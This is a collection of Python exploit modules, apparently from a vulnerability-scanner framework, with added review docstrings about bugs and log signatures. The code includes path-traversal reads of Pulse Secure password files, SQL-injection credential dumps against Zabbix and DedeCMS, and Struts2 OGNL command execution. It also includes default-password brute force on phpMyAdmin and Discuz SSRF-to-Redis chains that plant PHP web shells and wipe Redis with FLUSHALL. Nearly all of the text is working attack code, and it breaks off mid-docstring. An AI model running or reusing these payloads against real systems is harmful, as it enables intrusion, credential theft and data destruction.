    def get_user_password(self):
        """Fetch two files from the target through a path-traversal request.

        Both requests prefix the traversal ``/dana-na/../dana/html5acc/guacamole/../../../../../../../``
        onto a path under ``/data/runtime/mtmp/`` and append ``?/dana/html5acc/guacamole/``.

        Returns:
            ``(plantextpasswd, userhash)`` -- the raw response bodies of the two
            requests; either element is ``''`` when its request raised.

        Notes (review): ``verify=False`` disables TLS certificate validation on both
        requests, and every exception is swallowed, so a network error and a
        "not vulnerable" target are indistinguishable to the caller.  For
        defenders, the ``..`` segments following ``/dana/html5acc/guacamole/`` in
        the request path are the signature to alert on in gateway access logs.
        """
        # Traversal to the lmdb data file the PoC calls data.mdb.
        payload_palntext_passwd = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?" \
                  "/dana/html5acc/guacamole/"
        # Traversal to /data/runtime/mtmp/system.
        payload_user_hash = "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/system?" \
                    "/dana/html5acc/guacamole/"

        # Browser-like headers; note "Connection: close" so each request is its own TCP session.
        headers = {
            "User-Agent": "Mozilla/5.0",
            "Accept":
            "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        try:
            # timeout=(connect, read); the whole body is read into memory as text.
            plantextpasswd = req.get(self.url + payload_palntext_passwd,
                                     verify=False,
                                     headers=headers,
                                     timeout=(10, 15)).text
        except Exception as e:
            # Any failure (timeout, TLS, HTTP error) collapses to the empty string.
            plantextpasswd = ''
        try:
            userhash = req.get(self.url + payload_user_hash,
                               verify=False,
                               headers=headers,
                               timeout=(10, 15)).text
        except Exception as e:
            userhash = ''
        return plantextpasswd, userhash
    def _verify(self):
        """Error-based SQL injection check against ``/jsrpc.php``.

        Three GET requests differ only in the subquery injected into
        ``profileIdx2`` via ``updatexml(1,concat(0x7e,...),0)``; the injected
        value is read back from the ``XPATH syntax error: '~...'`` message in
        the response body.  On success ``result['DBInfo']`` holds ``Username``
        and ``Password``; on any exception ``result`` stays ``{}``.

        Returns:
            Whatever ``self.parse_attack(result)`` returns (defined elsewhere).

        Notes (review): only the first request sends ``headers``; the second and
        third (``info_pwd``, ``info_pwd_end``) omit them, which is an
        inconsistency rather than an intended difference as far as this code
        shows.  ``except Exception: pass`` hides every failure.  For defenders,
        ``updatexml(`` in a query string and ``XPATH syntax error`` in a
        response body are the log signatures of this technique.
        """
        try:
            result = {}
            headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'}
            # Subquery selects surname (first 31 chars) from users.
            payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(surname),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
            att_url = self.url + payload
            response = req.get(att_url,headers=headers,timeout=10)

            # extract the username from the XPATH error message
            info_name = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)

            # extract the password: first 31 chars (headers are not sent here)
            payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),1,31) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
            att_url = self.url + payload
            response = req.get(att_url,timeout=10)
            info_pwd = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)

            # remaining 32 chars of the password (substr offset 32)
            payload = "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999 or updatexml(1,concat(0x7e,(select substr(concat(passwd),32,32) from users limit 0,1)),0)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
            att_url = self.url + payload
            response = req.get(att_url,timeout=10)
            info_pwd_end = re.search(r'\[XPATH syntax error: \'~(.*?)\'\]',response.content)

            # All three fragments must be present before anything is reported.
            if info_name and info_pwd and info_pwd_end:
                username = info_name.group(1)
                password = info_pwd.group(1) + info_pwd_end.group(1)
                result['DBInfo'] = {}
                result['DBInfo']['Username'] = username
                result['DBInfo']['Password'] = password
        except Exception:
            # Silent: a timeout or a missing attribute leaves result == {}.
            pass
        return self.parse_attack(result)
 def strust2_037(self,url):
     """Probe *url* with an OGNL expression in the request path (Struts2 S2-037 style).

     A first request asks the expression to run ``echo vulnerable``; if the
     marker comes back, a second request runs ``whoami``.  ``result`` is
     populated only on the second step.

     Returns:
         Always ``{}`` -- see the note on the unconditional reset below.

     Notes (review): the ``result = {}`` just before ``return`` discards
     whatever the branch above filled in, so this method can never report a
     finding; the ``print output`` statements are Python 2 syntax and dump raw
     response bodies to stdout; ``verify=False`` disables TLS validation.  For
     defenders, ``%23_memberAccess`` / ``@java.lang.Runtime@getRuntime().exec``
     in a request path is the signature to alert on.
     """
     result = {} 
     proxies = {
         # 'http':'http://127.0.0.1:8081',
         # 'https':'http://127.0.0.1:8081',
     }
     # The command is taken from the `command` query parameter.
     payload = '/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo vulnerable'
     vul_url = url + payload
     r = req.get(url=vul_url, allow_redirects=False, proxies=proxies,verify=False)
     output = r.content
     print output
     if 'vulnerable' in output:
         exp = '/(%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%[email protected]@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=whoami'
         exp_url = url + exp
         r = req.get(url=exp_url, allow_redirects=False, proxies=proxies,verify=False)
         output = r.content
         print output
         # A body that merely echoes the query string is treated as "not executed".
         if 'cmd=whoami' not in output:
             #print u"vulnerable"
             result['VerifyInfo'] = {}
             result['name'] = 'strust2_037'
             result['VerifyInfo']['URL'] = url
             result['VerifyInfo']['Payload'] = payload
         else:
             result = {} 
     # BUG (review): unconditional reset -- everything collected above is dropped.
     result = {}
     return result  
 def TestingCms(self, url):
     """Fingerprint a DedeCMS-style install and its filesystem case sensitivity.

     For each known static path, a 200 on the original path followed by a 200
     on the same path with its first character upper-cased is taken to mean a
     case-insensitive filesystem; ``self.GetBackUp`` then decides the result.

     Returns:
         ``1`` when all three checks pass, otherwise ``0`` (also on any
         exception, via the bare ``except``).

     Notes (review): ``self.GetBackUp`` is called with ``self.url`` rather than
     the ``url`` parameter used for the other requests -- an inconsistency if
     the two ever differ.  The bare ``except`` turns a timeout on the first
     path into a "not vulnerable" answer without trying the remaining paths.
     """
     dedehash = [
         "/data/admin/ver.txt", "/data/admin/allowurl.txt",
         "/data/index.html", "/data/js/index.html",
         "/data/mytag/index.html", "/data/sessions/index.html",
         "/data/textdata/index.html", "/dede/action/css_body.css",
         "/dede/css_body.css", "/dede/templets/article_coonepage_rule.htm",
         "/include/alert.htm", "/member/images/base.css",
         "/member/js/box.js", "/php/modpage/readme.txt",
         "/plus/sitemap.html", "/setup/license.html", "/special/index.html",
         "/templets/default/style/dedecms.css",
         "/company/template/default/search_list.htm"
     ]
     for hashone in dedehash:
         try:
             dedehashone = url + hashone
             r = req.get(dedehashone, timeout=8)
             if r.status_code == 200:
                 # print 'check cms is ok'
                 # Upper-case the first path character after the leading '/'.
                 dedehashone = url + '/' + hashone[1].upper() + hashone[2:]
                 r = req.get(dedehashone, timeout=8)
                 if r.status_code == 200:
                     # print 'check os is ok'
                     if self.GetBackUp(self.url) == 1:
                         # print 'check short is ok'
                         return 1
                     else:
                         break
                 else:
                     break
         except:
             # Any exception (including timeouts) is reported as "not vulnerable".
             return 0
     return 0
    def _verify(self):
        """Try a short list of default credentials against a phpMyAdmin login page.

        The login URL is chosen by fingerprinting ``self.url`` itself (body
        contains ``phpMyAdmin`` and the localized username label) or
        ``/phpmyadmin/index.php`` (body contains ``input_password`` and a
        ``token`` field).  Each user/password pair is handed to ``self._netreq``.

        Returns:
            ``self.parse_output(result)`` for the first successful pair, else
            ``self.parse_output({})``-equivalent from the last loop iteration.

        Notes (review): when neither fingerprint matches, ``target_url`` stays
        ``''`` and the loop still issues 12 login attempts against an empty
        URL (each failure only prints).  For defenders, 12 rapid POSTs to
        ``index.php`` with ``pma_username``/``pma_password`` from one source is
        the detectable pattern.
        """
        result = {}
        user_list = ['root', 'admin']
        password_list = ['root', '123456', '12345678', 'password', 'passwd', '123']
        target_url = ''
        try:
            response = req.get(self.url)
            if 'phpMyAdmin' in response.content and '用户名' in response.content:
                target_url = str(self.url) + "/index.php"
            else:
                response = req.get(self.url + '/phpmyadmin/index.php')
                if 'input_password' in response.content and 'name="token"' in response.content:
                    target_url = self.url + "/phpmyadmin/index.php"
        except Exception as e:
            print e

        # 2 users x 6 passwords; stops at the first hit.
        for user in user_list:
            for password in password_list:
                try:
                    result = self._netreq(target_url, user, password)
                    if result:
                        print "result=>",result
                        return self.parse_output(result)
                except Exception as e:
                    print e

        return self.parse_output(result)
def get_current_work_path(host):
    """Read the configured work path from ``/ws_utc/resources/setting/options/general`` on *host*.

    Parses the XML response and returns the text of the first ``defaultValue``
    element found under a ``parameter`` element in ``section/options``.

    Args:
        host: Base URL of the target (scheme and host, no trailing path).

    Returns:
        The first ``defaultValue`` text, as a string.

    Notes (review): this helper terminates the process with ``exit(...)`` on a
    404, on a connection error, and when no value is found, instead of raising
    -- callers cannot recover.  The first GET is sent without the ``ua``
    headers; only the retry after "Deploying Application" uses them.  ``ET``
    is presumably ``xml.etree.ElementTree`` (imported elsewhere) -- confirm;
    it is fed a body controlled by the remote host.
    """
    geturl = host + "/ws_utc/resources/setting/options/general"
    ua = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'
    }
    values = []
    try:
        resp = req.get(geturl)
        if resp.status_code == 404:
            exit("[-] {}  don't exists CVE-2018-2894".format(host))
        elif "Deploying Application".lower() in resp.text.lower():
            # Application is still deploying: wait 20 s and fetch once more.
            print("[*] First Deploying Website Please wait a moment ...")
            time.sleep(20)
            resp = req.get(geturl, headers=ua)
        if "</defaultValue>" in resp.content:
            root = ET.fromstring(resp.content)
            value = root.find("section").find("options")
            # Collect every parameter/defaultValue text, in document order.
            for e in value:
                for sub in e:
                    if e.tag == "parameter" and sub.tag == "defaultValue":
                        values.append(sub.text)
    except req.ConnectionError:
        exit("[-] Cannot connect url: {}".format(geturl))
    if values:
        return values[0]
    else:
        print("[-] Cannot get current work path\n")
        exit(resp.content)
    def _attack(self):
        """SSRF-to-Redis chain: rewrite a Discuz setting through a gopher:// URL, then drop a file.

        The ``payload`` is a gopher URL to ``127.0.0.1:6379`` carrying a Redis
        ``eval`` that overwrites every ``*_setting`` key with a serialized
        PHP array; ``ssrf_url`` is the page that forwards it.  If the
        follow-up ``forum.php`` request returns 200, a base64 command is sent
        in ``&a=`` and ``shell.php`` is fetched to confirm.  Finally a second
        gopher URL issues ``flushall`` and the front page is requested once.

        Side effects:
            Rewrites ``self.url`` to scheme://host/<first path segment>.
            Sends a destructive ``flushall`` to the target's Redis.

        Returns:
            ``self.parse_output(result)`` where ``result['ShellInfo']`` is set
            only when the confirmation fetch returns 200 containing ``phpinfo``.

        Notes (review): ``base_rep`` is never reassigned inside the ``while``
        loop and ``break`` is only reachable when ``rep.status_code == 200``,
        so a non-200 ``forum.php`` response makes this loop spin forever,
        re-requesting ``shell_url``.  The author's own comment says
        ``ssrf_gopher.php`` is a test stub, not a real endpoint.  For
        defenders, ``gopher://127.0.0.1:6379`` in a query string is the
        signature to alert on.
        """
        result = {}
        ###
        #!!!!The ssrf_url is one file i put it in discuz for test.
        #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
        ###
        ssrf_url = "ssrf_gopher.php?ssrf="
        # %250D%250A is double-encoded CRLF so the SSRF layer decodes it once.
        payload = ('gopher://127.0.0.1:6379/'\
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'\
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
                   'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
                   ' end;return 1;" 0 %250D%250Aquit')
        #
        # Normalize self.url to scheme://netloc/<first path segment>.
        tmpparse = urlparse.urlparse(self.url)
        if tmpparse.path != '':    
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
            #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
        else:
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc
        
        vul_url = self.url + '/' + ssrf_url + payload

        base_rep = req.get(vul_url)
        print base_rep.status_code
        # NOTE(review): condition never changes inside the loop -- see docstring.
        while base_rep.status_code == 200:
            shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            print shell_url
            rep = req.get(shell_url)
            
            if rep.status_code == 200:
                shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[c1tas]);?>");phpinfo();'
                shell_payload_b64 = base64.b64encode(shell_payload)
                
                attack_url= shell_url + '&a=' + shell_payload_b64
                
                req.get(attack_url)
                
                # Confirmation: shell.php must answer 200 and echo "phpinfo".
                flag = "phpinfo";
                shell_url = self.url + '/' + 'shell.php'
                verify_url = shell_url + "?c1tas=phpinfo();"
                rep = req.get(verify_url)
                if rep.status_code == 200 and flag in rep.content:
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = shell_url
                    result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'

                
                # "Recovery" = FLUSHALL on the target's Redis: wipes every key, not just the modified ones.
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + '/' +ssrf_url +payload_flush
                req.get(recover_url)
                req.get(self.url + '/forum.php')

                break


        return self.parse_output(result)
 def _attack(self):
     """Write a file via ``/plus/download.php`` (``arrs1``/``arrs2`` char-code arrays) and check for it.

     The two arrays are decimal character codes that the target concatenates
     into an SQL statement; ``/plus/ad_js.php?aid=1`` is then requested to
     trigger it, and ``/plus/x.php`` is fetched as confirmation.

     Returns:
         ``self.parse_result(result)``; ``result['VerifyInfo']`` is set when the
         confirmation body "contains" ``w`` -- see the note below.

     Notes (review): ``str.find`` returns ``-1`` when the substring is absent,
     and ``-1`` is truthy, so ``if shell.content.find('w'):`` reports success
     for *every* body except one that starts with ``w``; the intended test is
     ``'w' in shell.content``.  For defenders, long ``arrs1[]=``/``arrs2[]=``
     runs of decimal codes on ``download.php`` are the signature to alert on.
     """
     result = {}
     target = self.url + '/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=32&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=61&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=97&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=119&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=39&arrs2[]=39&arrs2[]=102&arrs2[]=117&arrs2[]=99&arrs2[]=107&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=39&arrs2[]=39&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35'
     req.get(target)
     # Trigger: rendering ad id 1 executes the stored content.
     req.get(self.url + '/plus/ad_js.php?aid=1&nocache=1')
     shell = req.get(self.url + '/plus/x.php')
     # BUG (review): find() == -1 is truthy; this is almost always True.
     if shell.content.find('w'):
         result = {'VerifyInfo': {}}
         result['VerifyInfo']['shell'] = self.url + '/plus/x.php'
         result['VerifyInfo']['password'] = '******'
     return self.parse_result(result)
    def _attack(self):
        """SSRF-to-Redis chain (reformatted copy of the same routine above).

        Sends a gopher URL to ``127.0.0.1:6379`` through ``ssrf_gopher.php``
        whose Redis ``eval`` rewrites every ``*_setting`` key; if ``forum.php``
        then returns 200, a base64 command is passed in ``&a=`` and
        ``shell.php`` is fetched to confirm.  A ``flushall`` gopher URL and a
        final ``forum.php`` request follow.

        Side effects:
            Rewrites ``self.url``; sends ``flushall`` to the target's Redis.

        Returns:
            ``self.parse_output(result)``; ``ShellInfo`` is set only when the
            confirmation fetch returns 200 containing ``phpinfo``.

        Notes (review): same non-terminating loop as the other copy --
        ``base_rep`` is fixed for the life of the ``while`` and ``break`` sits
        under ``if rep.status_code == 200``, so a non-200 ``forum.php`` reply
        loops forever.  ``ssrf_gopher.php`` is, per the author's comment, a
        test stub.
        """
        result = {}
        ###
        #!!!!The ssrf_url is one file i put it in discuz for test.
        #!!!!One day you find the real ssrf in discuz you can change the ssrf_url to work well;
        ###
        ssrf_url = "ssrf_gopher.php?ssrf="
        # %250D%250A: double-encoded CRLF, decoded once by the forwarding layer.
        payload = ('gopher://127.0.0.1:6379/'\
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'\
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
                   'a:1:{s:7:\\\"plugins\\\";s:34:\\\"eval(base64_decode(\$_REQUEST[a]));\\\";}}}'\
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
                   ' end;return 1;" 0 %250D%250Aquit')
        #
        # Normalize self.url to scheme://netloc/<first path segment>.
        tmpparse = urlparse.urlparse(self.url)
        if tmpparse.path != '':
            self.url = tmpparse.scheme + '://' + tmpparse.netloc + '/' + tmpparse.path.split(
                '/')[1]
            #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
        else:
            self.url = tmpparse.scheme + '://' + tmpparse.netloc

        vul_url = self.url + '/' + ssrf_url + payload

        base_rep = req.get(vul_url)
        print base_rep.status_code
        # NOTE(review): loop condition is invariant -- see docstring.
        while base_rep.status_code == 200:
            shell_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            print shell_url
            rep = req.get(shell_url)

            if rep.status_code == 200:
                shell_payload = 'file_put_contents("shell.php","<?php @eval(\$_REQUEST[c1tas]);?>");phpinfo();'
                shell_payload_b64 = base64.b64encode(shell_payload)

                attack_url = shell_url + '&a=' + shell_payload_b64

                req.get(attack_url)

                # Confirmation: shell.php must answer 200 and echo "phpinfo".
                flag = "phpinfo"
                shell_url = self.url + '/' + 'shell.php'
                verify_url = shell_url + "?c1tas=phpinfo();"
                rep = req.get(verify_url)
                if rep.status_code == 200 and flag in rep.content:
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = shell_url
                    result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'

                # "Recovery" is FLUSHALL: it wipes every key in the target's Redis.
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + '/' + ssrf_url + payload_flush
                req.get(recover_url)
                req.get(self.url + '/forum.php')

                break

        return self.parse_output(result)
 def check_shell(url, verifycode):
     """Confirm that ``/<verifycode>.php`` exists and echoes ``md5(verifycode)``, then request its removal.

     On a match, ``result['VerifyInfo']['URL']`` is set and a second request
     passes ``cmd=rm -rf <verifycode>.php`` to the same file.

     Args:
         url: Base URL used for the confirmation request.
         verifycode: Random token used both as the file name and as the
             expected MD5 marker.

     Notes (review): ``result`` and ``self`` are not parameters, so this is
     presumably a closure inside a method (``result`` from the enclosing
     scope, ``self.url`` from the enclosing instance) -- confirm against the
     caller.  The confirmation uses ``url`` but the recorded URL and the
     cleanup use ``self.url``; if they differ the cleanup hits a different
     host.  ``hashlib.md5(verifycode)`` on a ``str`` is Python 2 only.
     """
     shell_url = url + '/{}.php'.format(verifycode)
     r = req.get(shell_url)
     if r.status_code == 200 and hashlib.md5(
             verifycode).hexdigest() in r.content:
         result['VerifyInfo'] = {}
         result['VerifyInfo']['URL'] = urljoin(
             self.url, "/{}.php".format(verifycode))
         # Best-effort cleanup; the response is not checked.
         req.get(
             urljoin(
                 self.url, "/{}.php?cmd=rm -rf {}.php".format(
                     verifycode, verifycode)))
    def _attack(self):
        """SSRF-to-Redis chain with a random marker and file name.

        ``self.url`` is expected to already point at the SSRF endpoint: the
        gopher ``eval`` payload is appended to it directly, while the Discuz
        pages are built from ``self.url.rpartition('/')[0]``.  The injected
        setting runs ``system(base64_decode($_GET[dshtanger]))``; a random
        8-char ``flag`` and file name ``shell_flag`` make the confirmation
        unambiguous.  On success a ``flushall`` gopher URL is sent and
        ``forum.php`` is requested once.

        Returns:
            ``self.parse_output(result)``; ``ShellInfo`` holds the written
            file's URL when it answers 200 and contains ``flag``.

        Notes (review): ``vul_rep`` is never reassigned and ``break`` is
        reachable only inside ``if (verify_rep.status_code == 200) and ...``,
        so a non-200 ``forum.php`` or a failed confirmation loops forever,
        re-running the whole body (including the write) each iteration.
        ``string.letters`` is Python 2 only.  The ``flushall`` "recovery"
        empties the target's Redis entirely.
        """
        result = {}
        url_part = self.url.rpartition('/')

        # Redis eval via gopher; %250D%250A is double-encoded CRLF.
        payload = (
            'gopher://127.0.0.1:6379/xeval '
            '"local t=redis.call(\'keys\',\'*_setting\');'
            'for i,v in ipairs(t) do redis.call(\'set\',v,'
            '\'a:2:{s:6:\\"output\\";a:1:{s:4:\\"preg\\";'
            'a:2:{s:6:\\"search\\";a:1:{s:7:\\"plugins\\";'
            's:5:\\"/^./e\\";}s:7:\\"replace\\";a:1:{s:7:\\"plugins\\";'
            's:40:\\"system(base64_decode($_GET[dshtanger]));\\";}}}'
            's:13:\\"rewritestatus\\";a:1:{s:7:\\"plugins\\";i:1;}}\') end;'
            'return 1;" 0 %250D%250Aquit')

        target_url = self.url + payload
        vul_rep = req.get(target_url)

        # NOTE(review): loop condition is invariant -- see docstring.
        while vul_rep.status_code == 200:
            shell_url = url_part[
                0] + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            shell_rep = req.get(shell_url)

            if shell_rep.status_code == 200:
                # random.choice is not a CSPRNG; fine for a marker, not for secrets.
                random_sed = string.letters + string.digits
                flag = ''.join([random.choice(random_sed) for _ in range(8)])
                shell_flag = ''.join(
                    [random.choice(random_sed) for _ in range(8)])

                #use system() write a shell php file and shell will retained after flushing redis apache
                shell_payload = 'echo \'<?php @eval($_POST[dshtanger]);echo "' + flag + '";?>\' > ' + shell_flag + '.php'
                shell_payload_b64 = base64.b64encode(shell_payload)
                #write a random php file
                req.get(shell_url + '&dshtanger=' + shell_payload_b64)
                #access this php file
                verify_url = url_part[0] + '/' + shell_flag + '.php'
                verify_rep = req.get(verify_url)

                if (verify_rep.status_code == 200) and (flag
                                                        in verify_rep.content):
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = verify_url
                    result['ShellInfo'][
                        'Content'] = '@eval($_POST[dshtanger]);'

                    #recover website -- FLUSHALL removes every key, not only the modified ones
                    flush_payload = 'gopher://127.0.0.1:6379/xflushall%0D%0Aquit'
                    flush_url = self.url + flush_payload
                    req.get(flush_url)

                    test_url = url_part[0] + '/forum.php'
                    req.get(test_url)

                    break
        return self.parse_output(result)
 def _verify(self, verify=True):
     """Send a crafted ``Range`` header derived from the resource's ``Content-Length``.

     A first request reads ``Content-Length``; the second sends
     ``Range: bytes=-<len+623>,-9223372036854<776000-(len+623)>`` and reports
     when the reply is ``206`` and the body contains ``Content-Range``.

     Args:
         verify: Unused by this body.

     Returns:
         ``self.parse_attack(result)``; ``result['desc']`` is ``"Vuln url"`` on a hit.

     Notes (review): ``"Content-Range" in r.content`` inspects the *body*, not
     the response headers where that field normally appears -- presumably
     ``r.headers`` was intended; confirm against the expected response.
     ``headers["Content-Length"]`` raises ``KeyError`` when the header is
     absent, and the second request has no ``timeout``.  For defenders, an
     oversized negative ``Range`` suffix like this is the signature to alert on.
     """
     vul_url = self.url
     result = {}
     headers = req.get(vul_url, timeout=10).headers
     file_len = headers["Content-Length"]
     # Two suffix ranges; the second is sized so the sum overflows a 64-bit counter.
     headers = {
         "Range":
         "bytes=-{},-9223372036854{}".format(
             int(file_len) + 623, 776000 - (int(file_len) + 623))
     }
     r = req.get(vul_url, headers=headers)
     if r.status_code == 206 and "Content-Range" in r.content:
         result['desc'] = "Vuln url"
     return self.parse_attack(result)
 def _verify(self):
     '''verify mode

     Requests ``/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd``
     (double-URL-encoded traversal) and reports success when the status is
     200 and the body contains ``bin``, ``/usr/sbin`` and ``root``.
     Port 8888 is appended when ``self.url`` carries no explicit port.

     Returns:
         ``self.parse_output(result)``; ``result['VerifyInfo']`` is
         ``"success"`` on a hit.

     Notes (review): the target is fetched twice (``response_code`` then
     ``r``) -- one request would do, and ``r.status_code`` is what the
     condition should read.  ``urllib.splittype``/``splithost``/``splitport``
     are Python 2 helpers.  For defenders, ``%252F`` sequences in a path are
     the signature of double-encoded traversal.
     '''
     vul_url = self.url
     proto, rest = urllib.splittype(vul_url)
     host, rest = urllib.splithost(rest)
     host, port = urllib.splitport(host)
     result = {}
     if port is None:
         vul_url = self.url + ":8888"
     target = vul_url + "/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd"
     # Duplicate request: status from the first, body from the second.
     response_code = req.get(target).status_code
     r = req.get(target)
     if response_code == 200 and "bin" in r.text and "/usr/sbin" in r.text and "root" in r.text:
         result['VerifyInfo'] = "success"
     pass
     return self.parse_output(result)
    def _attack(self):
        """Error-based SQL injection through ``respond.php``'s ``out_trade_no`` parameter.

        Looks up the table prefix with ``self.get_table_pre``, injects a
        ``union select`` that forces a duplicate-key error carrying
